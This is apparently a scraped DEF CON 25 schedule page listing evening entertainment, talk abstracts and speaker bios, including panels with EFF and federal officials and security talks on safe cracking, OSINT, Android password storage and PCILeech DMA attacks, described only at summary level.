Patrick Wardle is the Chief Security Researcher at Synack, and founder of Objective-See. Having worked at NASA and the NSA, and well as presented at many security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick's focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware. In his personal time, Patrick collects macOS malware and writes free macOS security tools.

@patrickwardle, objective-see.com


Return to Index      -     

 

Night Life - Track 1 - Thursday - 21:00-27:00


Title:
Official DEF CON Welcome Party

Come hang out and listen to some awesome music hosted by DEF CON.
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 23:00-24:00


Title:
Official Entertainment: ACID T

ACID T
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 25:30-26:00


Title:
Official Entertainment: CTRL/RSM

CTRL/RSM
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 21:00-22:00


Title:
Official Entertainment: DJDEAD

DJDEAD
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 22:30-23:00


Title:
Official Entertainment: DUALCORE

DUALCORE
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 22:00-23:00


Title:
Official Entertainment: JACKALOPE

JACKALOPE
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 24:00-25:30


Title:
Official Entertainment: KILL THE NOISE

KILL THE NOISE
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 25:30-26:00


Title:
Official Entertainment: KRISZ KLINK

KRISZ KLINK
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 23:30-24:00


Title:
Official Entertainment: LEFT/RIGHT

LEFT/RIGHT
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 23:00-23:30


Title:
Official Entertainment: MC FRONTALOT

MC FRONTALOT
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 21:00-22:00


Title:
Official Entertainment: MODERNS

MODERNS
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 25:00-26:00


Title:
Official Entertainment: NINJULA

NINJULA
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 24:00-25:30


Title:
Official Entertainment: REEL BIG FISH

REEL BIG FISH

For your DEF CON After Dark enjoyment, we present Friday's headliners, Reel Big Fish! They're fresh from their Beer Run Tour and ready to bring their trademark SoCal skank to the DEF CON masses.

In case you're not familiar, a bio snippet: "Reel Big Fish were one of the legions of Southern California ska-punk bands to edge into the mainstream following the mid-'90s success of No Doubt and Sublime. Like most of their peers, they were distinguished by their hyperkinetic stage shows, juvenile humor, ironic covers of new wave pop songs, and metallic shards of ska."

Sounds fun, yes? Yes.

Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 24:00-25:00


Title:
Official Entertainment: REID SPEED

REID SPEED
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 21:00-22:30


Title:
Official Entertainment: Richard Cheese

Richard Cheese

Friday, in the Chillout area, please to enjoy the nearly-too-swanky-to-function sounds of returning DEF CON performers (and DEF CON Soundtrack contributors!) Richard Cheese and Lounge Against the Machine!

America's loudest lounge singer Richard Cheese performs swingin' Vegas versions of rock and rap songs, "swankifying" popular Top40 hits into retro vocal standards. Imagine Sinatra singing Radiohead, and you've got Richard Cheese & Lounge Against The Machine.

The aforementioned DEF CON soundtrack is included with admission at DEF CON 25 or by donating to the EFF (url coming soon).

Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 26:00-27:00


Title:
Official Entertainment: SCOTCH AND BUBBLES

SCOTCH AND BUBBLES
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 22:00-23:00


Title:
Official Entertainment: SKITTISH AND BUS

SKITTISH AND BUS
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 23:30-24:00


Title:
Official Entertainment: YT CRACKER

YT CRACKER
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 23:00-23:30


Title:
Official Entertainment: ZEBBLER ENCANTI

ZEBBLER ENCANTI

Saturday Night, y'all!

Zebbler Encanti Experience (aka ZEE) is what happens when Pixel Wizard and Techno Badger meet in the woods and decide to short circuit neural pathways of the nearby mushroom pickers with nothing short of bassquakes (9.0 on the scale of awesome) and complete visual reality replacement (somewhat too awesome and terrifying to be numbered anything in particular).

That historic meeting in the woods is the underpinning of the very garments that ZEE now wear at every event they perform. The mere loosening of a button of their coats' pockets opens up a wormhole of psychedelic visions and sub-sonic rattles. But Zebbler Encanti Experience do more than that. They open their minds fully to each and every dance floor and ask you to Get In There!

Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 09:30-09:59


Title:
One-click Browser Defense

0930 Friday
Brandon Dixon
@9bplus
One-click Browser Defense
Despite significant advances in security technology, web browsers still function as one of the primary vehicles for attack delivery, yet don't offer much in way of protection. Using built-in interfaces, it's possible to bring defense directly to the browser without the need to change any behavior. In one-click, you can add an additional layer of security to your most vulnerable assets, people.

Return to Index      -     

 

DEFCON - Track 2 - Friday - 12:00-12:45


Open Source Safe Cracking Robots - Combinations Under 1 Hour! (Is it bait? Damn straight it is.)

Friday at 12:00 in Track 2

45 minutes | Demo, Tool, Exploit

Nathan Seidle Founder, SparkFun Electronics

We've built a $200 open source robot that cracks combination safes using a mixture of measuring techniques and set testing to reduce crack times to under an hour. By using a motor with a high count encoder we can take measurements of the internal bits of a combination safe while it remains closed. These measurements expose one of the digits of the combination needed to open a standard fire safe. Additionally, 'set testing' is a new method we created to decrease the time between combination attempts. With some 3D printing, Arduino, and some strong magnets we can crack almost any fire safe. Come checkout the live cracking demo during the talk!

Nathan Seidle
Nathan Seidle is the founder of SparkFun Electronics in Boulder, Colo. Nathan founded SparkFun in 2003 while an undergraduate student studying electrical engineering. After building the company across 14 years to over 130 employees he now heads the SparkX Lab within SparkFun, tinkering, hacking and building new products.

Nathan has built a large catalog of off the beaten path projects including a 12' GPS clock, a wall sized Tetris interface, an autonomous miniature electric bat-mobile, a safe cracking robot, and a hacked bathroom scale to measure the weight of his beehive. He believes strongly in the need to teach the next generation of technical citizens.

Nathan is a founding member of the Open Source Hardware Association. He has served on the board of OSHWA and continues to promote and serve the organization. Nathan has been invited to the White House to participate in discussions around intellectual property policy and patent reform and attended multiple White House Maker Faires. Nathan has spoken in front of Congress on copyright and trademark policy. He has presented on the many facets of manufacturing and open hardware at the National Science Foundation, Google, and Sketching in Hardware. Nathan has guest lectured at numerous institutions including MIT, Stanford and West Point Academy.

In their off time, Nathan and his wife Alicia can be found making rather silly electronics projects together for their local Public Library, their nieces and nephews, and Burning Man. Nathan and Alicia live in Boulder, Colorado with their pet tree Alfonso.

@chipaddict, @sparkfun, www.sparkfun.com


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 12:00-13:00


Title:
Operational Security Lessons from the Dark Web

Author:
Shea Nangle

Abstract:
The past 5 years have seen a number of arrests and a number of convictions of parties engaged in criminal activities on the Dark Web. From Dread Pirate Roberts to French Maid, Willy Clock to Shiny Flakes, and others, we will explore operational security failures made that led to their arrests, and in some cases, convictions.

Why look at this? There are lessons to be learned from these cases even if you aren't in a position to be accused of running a multinational drug distribution ring. Whether you concerned with surveillance and/or reprisals from hostile nation-states or are simply wanting to better guard your privacy, we can all learn from these cases.

Attendees will leave this session with concrete tactical recommendations for increasing the operational security of their online lives and protecting their privacy.

Bio:
Shea Nangle works in information security in the Washington DC area. His areas of interest include open source intelligence, operational security, and forensics. In his spare time, you can often find him homebrewing and attending heavy metal concerts.
Twitter handle of presenter(s): @ultrashea

Return to Index      -     

 

DEFCON - Track 2 - Thursday - 11:00-11:45


Opt Out or Deauth Trying !- Anti-Tracking Bots Radios and Keystroke Injection

Thursday at 11:00 in 101 Track 2

45 minutes | 0025, Demo, Tool, Exploit

Weston Hecker Principal Application Security Engineer, "NCR"

It's hard not to use a service now days that doesn't track your every move and keystroke if you absolutely must use these systems why not give them the most useless information possible. Along with the fact that several companies are tracking their customers online now they are taking it to physical brick and mortar stores this talk will be geared looking at the attack surface of instore tracking and attacking these systems for the purpose of overloading their systems or making the information so inaccurate that it becomes useless. Watch as a 32 year old hackers online profile is turned to that of a 12 year old girl who loves horses!

Weston Hecker
With 12 Years Pen-testing, 13 years' security research and programming experience. Weston is currently working on the application security team of NCR Weston has recently Spoken at DEF CON 22,23 and 24, Blackhat 2016, HOPE11, Hardware.IO 2016, Takdowncon 2016, ICS cyber security 2016, Bsides Boston, Enterprise Connect 2016 ISC2-Security Congress, SC-Congress Toronto and over 60 other speaking engagements from regional events to universities on security subject matter. Working with A Major University's research project with Department of Homeland Security on 911 emergency systems and attack mitigation.Found several vulnerabilities' in very popular software and firmware. Including Microsoft, Qualcomm, Samsung, HTC, Verizon.


Return to Index      -     

 

RCV - Palermo room, Promenade level - Saturday - 15:15-15:59


OSINT Tactics on Source Code & Developers

Abstract

This practical talk is about using OSINT techniques and tools to obtain intelligence from source code. By analyzing the source code, we will profile developers in social networks to see what social networks they use, what they are saying, who they follow, what they like and much more data about them.

We will use well-known tools and custom Python scripts to automatize the parsing of source code, analyzing comments for behavior and sentiments, searching for OSINT patterns in code and fingerprinting developers in social networks, among other things. The collected data will be plotted in different visualizations to make the understanding of information easier.

The objective of the talk is to introduce attendees into OSINT tactics they can use to collect and analyze data, use the right tools and automatize tasks with Python scripting. For this example we have targeted developers and their projects.

Come and learn some OSINT tricks you can apply to collect and analyze data!

Speaker Profile

Simon Roses (@simonroses) holds a B.S. from Suffolk University (Boston), Postgraduate in E-Commerce from Harvard University (Boston) and Executive MBA from IE Business School (IE, Madrid).

Currently is the CEO at VULNEX, driving security innovation. Former Microsoft, PriceWaterhouseCoopers and @Stake.

Simon has authored and cooperated in several security Open Source projects like OWASP Pantera and LibExploit. He has also published security advisories in commercial products.

Simon was award with a DARPA Cyber Fast Track (CFT) grand to research on application security.

Frequent speaker at security industry events including BLACKHAT, DEF CON, RSA, HITB, OWASP, SOURCE. DeepSec and Microsoft Security Technets.
CISSP, CEH & CSSLP

Blog: www.simonroses.com


Return to Index      -     

 

DEFCON - Trevi Room - Friday - 20:00-21:59


Panel - An Evening with the EFF

Friday at 20:00 - 22:00 in Trevi Room

Evening Lounge | 0025

Kurt Opsahl Deputy Executive Director & General Counsel, Electronic Frontier Foundation

Nate Cardozo EFF Senior Staff Attorney

Eva Galperin EFF Director of Cyber security

Shabid Buttar Director of Grassroots Advocacy

Kit Walsh EFF Staff Attorney

Relax and enjoy in an evening lounge while you get the latest information about how the law is racing to catch up with technological change from staffers at the Electronic Frontier Foundation, the nation's premiere digital civil liberties group fighting for freedom and privacy in the computer age. This Evening Lounge discussion will include updates on current EFF issues such as surveillance online, encryption (and backdoors), and fighting efforts to use intellectual property claims to shut down free speech and halt innovation, discussion of our technology project to protect privacy and speech online, updates on cases and legislation affecting security research, and much more.

Kurt Opsahl
KURT OPSAHL is the Deputy Executive Director and General Counsel of the Electronic Frontier Foundation. In addition to representing clients on civil liberties, free speech and privacy law, Opsahl counsels on EFF projects and initiatives. Opsahl is the lead attorney on the Coders' Rights Project. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arribasoft, MGM v. Grokster and CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall, and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named as one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Court appeal. In 2014, Opsahl was elected to the USENIX Board of Directors.

@kurtopsahl, @eff

Nate Cardozo
NATE CARDOZO is a Senior Staff Attorney on the Electronic Frontier Foundation's digital civil liberties team. In addition to his focus on free speech and privacy litigation, Nate works on EFF's Who Has Your Back? report and Coders' Rights Project. Nate has projects involving cryptography and the law, automotive privacy, government transparency, hardware hacking rights, anonymous speech, electronic privacy law reform, Freedom of Information Act litigation, and resisting the expansion of the surveillance state. A 2009-2010 EFF Open Government Legal Fellow, Nate spent two years in private practice before returning to his senses and to EFF in 2012. Nate has a B.A. in Anthropology and Politics from U.C. Santa Cruz and a J.D. from U.C. Hastings where he has taught first-year legal writing and moot court. He brews his own beer, has been to India four times, and watches too much Bollywood.

Eva Galperin
EVA GALPERIN is EFF's Director of Cybersecurity. Prior to 2007, when she came to work for EFF, Eva worked in security and IT in Silicon Valley and earned degrees in Political Science and International Relations from SFSU. Her work is primarily focused on providing privacy and security for vulnerable populations around the world. To that end, she has applied the combination of her political science and technical background to everything from organizing EFF's Tor Relay Challenge, to writing privacy and security training materials (including Surveillance Self Defense and the Digital First Aid Kit), and publishing research on malware in Syria, Vietnam, Kazakhstan. When she is not collecting new and exotic malware, she practices aerial circus arts and learning new languages.

Shabid Buttar
SHAHID BUTTAR is EFF’s Director of Grassroots Advocacy, who leads EFF's grassroots and student outreach efforts, including the organizing the Electronic Frontier Alliance. He's a constitutional lawyer focused on the intersection of community organizing and policy reform as a lever to shift legal norms, with roots in communities across the country resisting mass surveillance. From 2009 to 2015, he led the Bill of Rights Defense Committee as Executive Director. After graduating from Stanford Law School in 2003, where he grew immersed in the movement to stop the war in Iraq, Shahid worked for a decade in Washington, D.C. He first worked in private practice for a large California-based law firm, with public interest litigation projects advancing campaign finance reform, and marriage equality for same-sex couples as early as 2004, when LGBT rights remained politically marginal. From 2005 to 2008, he helped build a national progressive legal network and managed the communications team at the American Constitution Society for Law & Policy, and in 2008 and 2009 he founded the program to combat racial & religious profiling at Muslim Advocates. Outside of work, Shahid DJs and produces electronic music, writes poetry & prose, kicks rhymes, organizes guerilla poetry insurgencies, plays capoeira, speaks truth to power on Truthout, occasionally elucidates legal scholarship, and documents counter-cultural activism for the Burning Man Journal.

Kit Walsh
KIT WALSH is a staff attorney at EFF, working on free speech, net neutrality, copyright, coders' rights, and other issues that relate to freedom of expression and access to knowledge. She has worked for years to support the rights of political protesters, journalists, remix artists, and technologists to agitate for social change and to express themselves through their stories and ideas. Prior to joining EFF, Kit led the civil liberties and patent practice areas at the Cyberlaw Clinic, part of Harvard's Berkman Center for Internet and Society, and previously Kit worked at the law firm of Wolf, Greenfield & Sacks, litigating patent, trademark, and copyright cases in courts across the country. Kit holds a J.D. from Harvard Law School and a B.S. in neuroscience from MIT, where she studied brain-computer interfaces and designed cyborgs and artificial bacteria.


Return to Index      -     

 

DEFCON - Capri Room - Saturday - 20:00-21:59


Panel - Meet the Feds (who care about security research)

Saturday at 20:00 - 22:00 in Capri Room

Evening Lounge

Allan Friedman Director of Cybersecurity, National Telecommunications and Information Administration, US Department of Commerce

Amélie E. Koran Deputy Chief Information Officer, U.S. Department of Health and Human Services, Office of the Inspector General

Leonard Bailey Special Counsel for National Security, Computer Crime & Intellectual Property Section, Criminal Division, U.S. Department of Justice

Nick Leiserson Legislative Director, Office of Congressman James R. Langevin (RI-02)

Kimber DowsettSecurity Architect, 18F

Security research is no longer a foreign concept in Washington, DC. A growing number of policymakers are not only thinking about its importance, but are eager to work with hackers to better understand the implications of policy and to help hackers navigate laws that affect security research. Officials from the Department of Commerce, the Department of Justice, Health & Human Services, General Services Administration, and Congress will talk about how security policy has been evolving; help you understand how you can get involved and make your voice heard; and host an extended Q&A. Hear about everything from making laws more hacker friendly to encryption to government bug bounties to IoT security. It's your opportunity to meet the feds and ask them anything.

Allan Friedman
Allan Friedman is the Director of Cybersecurity Initiatives at National Telecommunications and Information Administration in the US Department of Commerce. He coordinates NTIA's multistakeholder processes, bringing together the community on issues like vulnerability disclosure and IoT Security. Prior to joining the Federal Government, Friedman spent over a decade as a noted cybersecurity and technology policy researcher at Harvard's Computer Science Department, the Brookings Institution, and George Washington University's Engineering School. He has a degree in computer science from Swarthmore College and a Ph.D. in public policy from Harvard University, and is the Co-Author of "Cybersecurity and Cyberwar: What Everyone Needs to Know".

Amélie E. Koran
serves as the Deputy Chief Information Officer for the U.S. Department of Health and Human Services, Office of the Inspector General. Amélie’s path to DHHS OIG took her the long way around - through multiple industry sectors, academia, and the public sector. Her professional experience includes time spent at The Walt Disney Company, Carnegie Mellon University CERT/CC, Mandiant, The World Bank, and The American Chemical Society. She began her time in the public sector as Lead Enterprise Security Architect for the U.S. Department of the Interior, eventually moving on to lead Continuous Diagnostics and Mitigation implementation for the U.S. Treasury Department. Amélie later spent time on a leadership development rotation as part of the President’s Management Council Fellowship serving the Federal CIO in supporting cybersecurity policy analysis and legislative review, where she took an active role in the government-wide Open Data Initiative and helped in giving “birth” to the United States Digital Service (USDS). She’s an ardent advocate for innovative approaches to hiring talent and rationally applying security strategies and technologies for the Federal Government space.

@webjedi

Leonard Bailey
Mr. Bailey is Special Counsel for National Security in the Computer Crime and Intellectual Property Section. He has prosecuted computer crime cases and routinely advises on cybersecurity, searching and seizing electronic evidence, and conducting electronic surveillance. He has managed DOJ cyber policy as Senior Counselor to the Assistant Attorney General for the National Security Division and then as an Associate Deputy Attorney General. He has also served as Special Counsel and Special Investigative Counsel for DOJ's Inspector General. Mr. Bailey is a graduate of Yale University and Yale Law School. He has taught courses on cybercrime and cybersecurity at Georgetown Law School and Columbus School of Law in Washington, D.C.

Nick Leiserson
Nick Leiserson is Legislative Director to Congressman Jim Langevin (RI-02), a senior member of the House Armed Services and Homeland Security Committees and the co-founder of the Congressional Cybersecurity Caucus. Leiserson serves as Rep. Langevin's principal advisor on an array of issues, particularly homeland security; judiciary; and technology policy. He holds a degree in computer science from Brown University.

Kimber Dowsett
Kimber Dowsett is the Security Architect for 18F, a digital services agency based within the US Government’s General Services Administration, who secures cloud infrastructure architecture while also serving as the Chief Incident Responder for the 18F platform. She is passionate about privacy, encryption, and building user-driven technology for the public.

Recently named one of the 2017 Top Women in Cybersecurity by CyberScoop, Kimber’s background is in Information Security, Incident Response, Security Policy, and Penetration Testing. She is an avid admirer of Chiroptera and is a connoisseur of comic books and video games.

@mzbat


Return to Index      -     

 

DEFCON - Track 2 - Friday - 17:00-17:45


Panel: DEF CON Groups

Friday at 17:00 in Track 2

45 minutes | Audience Participation

Jeff Moss (Dark Tangent) Founder, DEF CON

Waz DCG

Brent White (B1TKILL3R) DCG and DC615

Jayson E. Street DCG Ambassador

Grifter DC801

Jun Li DC010

S0ups DC225

Major Malfunction DC4420

Do you love DEF CON? Do you hate having to wait for it all year? Well, thanks to DEF CON groups, you're able to carry the spirit of DEF CON with you year round, and with local people, transcending borders, languages, and anything else that may separate us!

In this talk, you'll hear from DEF CON's founder, Dark Tangent, who is also moderating the panel. Jayson E. Street, the Ambassador of DEF CON groups will also discuss updates about the program and share information from his global travel to help start groups around the world. We will also discuss what DEF CON groups are, how to get involved, as well as ideas for how to run a group, location ideas, and how to spread the word.

Founders of their own local DEF CON groups will also discuss the awesome projects of their groups, as well as projects from other groups, to give ideas to take back to your own DEF CON group. Projects we'll discuss range from custom badge build, IoT devices, vintage gaming systems, custom built routers, smarthome devices and more!

Jeff Moss (Dark Tangent)
Bio Coming soon.

Waz
Bio Coming soon.

Brent White (B1TKILL3R)
Bio Coming soon.

Jayson E. Street
Bio Coming soon.

Grifter
Bio Coming soon.

Jun Li
Bio Coming soon.

S0ups
Bio Coming soon.

Major Malfunction
Bio Coming soon.


Return to Index      -     

 

DEFCON - Track 4 - Friday - 10:20-11:35


Panel: Meet The Feds

Friday at 10:20 in Track 4

75 minutes

Andrea Matwyshyn Cranky law professor.

Terrell McSweeny Commissioner, Federal Trade Commission

Dr. Suzanne Schwartz FDA

Leonard Bailey Special Counsel for National Security, Computer Crime & Intellectual Property Section, Criminal Division, U.S. Department of Justice

Lisa Wiswell Principal, Grimm
Fellow, Center for Strategic and International Studies

Making legal and policy progress on security is hard, especially when it involves coordinating with teams inside and across federal agencies/departments. But, there *are* success stories. DOJ, FDA, FTC, and DoD have all evolved in positive directions in their approach to security over the last five years, engaging more robustly with the security research community. The panelists will introduce their respective agencies/ departments, explain their missions, and describe the evolution of their organizations' approach across time to security and security research. As always, the panelists look forward to answering your questions.

Andrea Matwyshyn
Andrea Matwyshyn is an academic and author whose work focuses on technology and innovation policy, particularly information security, consumer privacy, intellectual property, and technology workforce pipeline policy. She is a (tenured full) professor of law / professor of computer science (by courtesy) at Northeastern University, where she is the co-director of the Center for Law, Innovation, and Creativity (CLIC). Andrea is also a faculty affiliate of the Center for Internet and Society at Stanford Law School and a visiting research collaborator at the Center for Information Technology Policy at Princeton University, where she was the Microsoft Visiting Professor of Information Technology Policy during 2014-15. She is a Senior Fellow of the Cyber Statecraft Initiative at the Atlantic Council's Brent Scowcroft Center on International Security and a US-UK Fulbright Commission Cyber Security Scholar award recipient in 2016-2017. In 2014, she served as the Senior Policy Advisor/ Academic in Residence at the U.S. Federal Trade Commission. Prior to entering the academy, she was a corporate attorney in private practice.

Terrell McSweeny
Terrell McSweeny serves as a Commissioner of the Federal Trade Commission. When it comes to tech issues, Commissioner McSweeny has focused on the valuable role researchers and hackers can play protecting consumer data security and privacy. She opposes bad policy and legislative proposals like mandatory backdoors and the criminalization of hacking and believes that enforcers like the FTC should work with the researcher community to protect consumers. She wants companies to implement security by design, privacy by design and data ethics by design–but recognizes that, in the absence of regulation, enforcement and research are the only means of holding companies accountable for the choices they make in the ways that they hold and use consumer data.

@TMcSweenyFTC

Dr. Suzanne Schwartz
Dr. Suzanne Schwartz is the Associate Director for Science & Strategic Partnerships at FDA’s Center for Devices & Radiological Health (CDRH). In this role, she assists the CDRH Director and Deputy Director for Science in the development, execution and evaluation of the Center’s biomedical science and engineering programs. Suzanne is passionate about cultivating critical dialogue across sectors and across entities towards advancing innovation in the biomedical space and within healthcare, where complex multifaceted problems exist. Suzanne joined FDA in October 2010. Initially recruited as a Commissioner’s Fellow, she became a Medical Officer in the Office of Device Evaluation, transitioning in September 2012 to become the Director of CDRH’s Emergency Preparedness/Operations and Medical Countermeasures (EMCM) Program in the Office of the Center Director for the past 4 years. Among other public health concerns, her portfolio has most notably included medical device cybersecurity, for which she chairs CDRH’s Cybersecurity Working Group. She also co-chairs the Government Coordinating Council for Healthcare & Public Health critical infrastructure sector. Before FDA, Suzanne was a full time surgical faculty member at Weill Cornell Medical College, New York. Suzanne’s career has spanned the private sector as well, having served as Medical Director & Tissue Bank Director of Ortec International, a development stage medical device company focused on tissue engineering therapeutic approaches to burns and chronic wounds. Suzanne earned an MD from Albert Einstein College of Medicine, trained in General Surgery & Burn Trauma at the New York Presbyterian Hospital - Weill Cornell Medical Center; an executive MBA from NYU Stern School of Business, and completed the National Preparedness Leadership Initiative – Harvard School of Public Health & Kennedy School of Government.

Leonard Bailey
Leonard Bailey joined the Department of Justice's Terrorism and Violent Crime Section (TVCS) in 1991 where he handled litigation and investigations, managed departmental policies governing criminal enforcement and intelligence collection, and participated in the negotiation of international treaties concerning terrorist funding. He subsequently served as Special Counsel and Special Investigative Counsel to the Department's Inspector General while conducting investigations of senior Department officials and sensitive departmental programs. In 2000, he joined the Computer Crime and Intellectual Property Section (CCIPS) where he has prosecuted cases involving federal violations of computer crime and intellectual property statutes; advised on matters related to searching and seizing electronic evidence, investigating and prosecuting network intrusions, and conducting electronic surveillance; and chaired the Organization of American States' Group of Government Experts on Cybercrime. He has been Special Counsel for National Security in CCIPS since 2008. In 2009, he accepted a position as Senior Counselor to the Assistant Attorney General for the National Security Division, where he managed issues associated with cybersecurity, critical infrastructure protection, and national security investigations and operations involving cyber threats to national security. In 2012, he managed and set cyber policy for the Department of Justice as an Associate Deputy Attorney General before returning to the Criminal Division in 2013. Leonard received his B.A. from Yale University in 1987 and his J.D. from Yale Law School in 1991. He is an adjunct professor at Georgetown Law School, where he teaches cybersecurity law..

Lisa Wiswell
Lisa Wiswell worked for the better part of the past decade with the Department of Defense to shift its culture to interact more positively with the hacker community. At the Defense Digital Service, she hacked the Department of Defense bureaucracy and its antiquated and restrictive policies and processes. She was appointed Special Assistant to the Deputy Assistant Secretary of Defense for Cyber Policy in the Office of the Secretary of Defense where she supported senior DoD leaders by formulating and implementing policies and strategies to improve DoD’s ability to operate in digital space – specifically providing guidance and governance over the manning, training, and equipping of the Cyber Mission Force. Prior to serving in the Obama Administration, she served as Technology Portfolio Manager at the Defense Advanced Research Projects Agency overseeing a portfolio of cyberwarfare initiatives directly contributing to national security. Prior to supporting the DoD, Lisa worked on Capitol Hill for her home Member of Congress. She holds a BA in History and Political Science from the Maxwell School of Public Citizenship at Syracuse University, and a Masters in Technology Management from Georgetown University. Lisa is a privacy rights and STEM outreach advocate. She is now a Principal at Grimm and a Fellow at the Center for Strategic and International Studies.


Return to Index      -     

 

VMHV - Roman 1, Promenade Level - Friday - 17:00-17:45


Title:
Panel: Securing the Election Office: A Local Response to a Global Threat

Title: Panel: Securing the Election Office: A Local Response to a Global Threat

PANEL BIOS

Jake Braun (moderator) bio
Jake Braun, CEO Cambridge Global and former White House-DHS Liaison

Jake Braun is CEO of Cambridge Global Advisors where he provides strategic direction and consulting for high profile cyber and national security initiatives. Prior to joining CGA, Mr. Braun was the Director of White House and Public Liaison for the Department of Homeland Security (DHS) where he was instrumental in the passage of the unprecedented Passenger Name Record (PNR) Agreement, one of the largest big data agreements in history. In addition, he worked on the development and implementation of the Homeland Security Advisory Councils Task Force on CyberSkills.

In 2009, Mr. Braun served on the Presidential Transition Team for the Obama Administration as Deputy Director for the National Security Agencies Review. Prior to that, Mr. Braun also worked as National Deputy Field Director to the 2008 Obama for America Campaign, along with multiple other federal, state and local campaigns around the nation over the years.

Mr. Braun is a fellow at the Council on CyberSecurity and is a strategic advisor to DHS and the Pentagon on cybersecurity. He is also faculty at the University of Chicagos Harris School of Public Policy where he teaches cybersecurity policy.


Tim Blute Bio
Tim Blute, Homeland Security & Public Safety Program Director, National Governors Association

Timothy Blute serves as program director for the NGA Center for Best Practices Homeland Security & Public Safety Division. Blute focuses on cybersecurity, public safety communications and information sharing. Prior to joining NGA, Blute served as intelligence analyst in the Counterterrorism Division of the Federal Bureau of Investigation, detailee to the Office of the General Counsel at the National Security Law Branch and intern for the U.S. Department of the Treasury. Blute holds a J.D. from the American University Washington College of Law and a bachelors degree in International affairs from the George Washington University,


Erik Kamerling Bio
Erik Kamerling
Senior Director, Cyber Security Technology at Center for Internet Security

Mr. Kamerling is a Senior Director at The Center for Internet Security with nineteen years of experience in the fields of advisory and consulting, network security assessment, penetration testing, vulnerability research, monitoring/incident response, and fundamental security research. His role at the Center for Internet Security is to spearhead technology developments for the Multi-State Information Sharing & Analysis Center (MSISAC). His current projects include global honeynet operations that study breaking threats that target State, Local, Territorial and Tribal entities, leading hunting and patrolling initiatives in the MSISAC, driving new capabilities in Albert network engineering, and security community outreach.

In the past, Erik has held lead positions at Mandiant, Symantec, RSA, and the SANS Institute. He enjoys writing and research on cyber intelligence topics and has driven the development of keynote speeches, research presentations, course-ware, advisories, papers, and hacking and penetration testing classes taught in a variety of venues.


Noah Praetz bio
Noah Praetz, Director of Elections for Suburban Cook County
Noah Praetz is an expert in state and federal election law. He is currently the Director of Elections for Suburban Cook County in Illinois, a role he assumed in 2013 after serving as the former Cook County Deputy Director of Elections and various other roles including Deputy Director, Manager of Planning and Preparation, Law Clerk and Staff Attorney.

Praetz is active in several election organizations, including the International Association of Clerks, Recorders, Election Officials and Treasurers. He is a graduate of Bradley University and DePaul College of Law. He lives in Indian Head Park with his wife, Megan O'Connell, and their three children.

Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 18:10-18:59


Passwords on a Phone

Sam Bowne

Almost all Android apps from major retailers store your password on the phone, which is dangerous and unnecessary. And they don't even use the Android KeyStore; they just use custom encryption schemes that generate a key in predictable ways, so passwords are easily recoverable. This is “fake encryption” – the data appears to be encrypted but in fact is not actually protected from attackers. I will present results of my tests of many top retailers, and demonstrate how to steal passwords from them. I will also list a few (very few) companies who actually protect their customers' passwords properly.

Sam Bowne (Twitter: @sambowne) has been teaching computer networking and security classes at CCSF since 2000. He has given talks at DEFCON, HOPE, BayThreat, LayerOne, and Toorcon, and taught classes and many other schools and teaching conferences. He has these things: BS, PhD, CEH, CISSP, WCNA, and a lot of T-shirts.


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 14:10-14:30


Past, Present and Future of High Speed Packet Filtering on Linux

Gilberto Bertin, CLoudflare

As internet DDoS attacks get bigger and more elaborate, the importance of high performance network traffic filtering increases. Attacks of hundreds of millions of packets per second are now commonplace. In this session, we will introduce modern techniques for high speed network packet filtering on Linux. We will follow the evolution of the subject, starting with Iptables and userspace offload solutions (such as EF_VI and Netmap), discussing their use cases and their limitations. We will then move on to a new technology recently introduced in the Linux kernel called XDP (express data path), which works by hooking an eBPF program into the lowest possible layer in the Linux kernel network stack, allowing network traffic to be filtered at high speeds.

Gilberto Bertin (Twitter: @akajibi) originally from a little Italian town near Venice, loves tinkering with low level systems, especially networking code. After working on variety of technologies like P2P VPNs and userspace TCP/IP stacks, he decided to move to London to help the Cloudflare DDoS team filter all the bad internet traffic.


Return to Index      -     

 

Demolabs - Table 3 - Sunday - 12:00-13:50


PCILeech

Ulf Frisk

Sunday from 1200-1350 at Table Three

Total physical pwnage and plenty of live demos in this action packed Demo Lab! The PCILeech direct memory access attack toolkit was presented at DEF CON 24 and quickly became popular amongst red teamers and governments alike. A year later major operating systems are still vulnerable by default. I will demonstrate how to take total control of Linux, Windows and macOS by PCIe DMA code injection. Kernels will be subverted, full disk encryption defeated, file systems mounted and shells spawned! All this by using affordable hardware and the open source PCILeech toolkit.

http://github.com/ufrisk/pcileech

Ulf Frisk
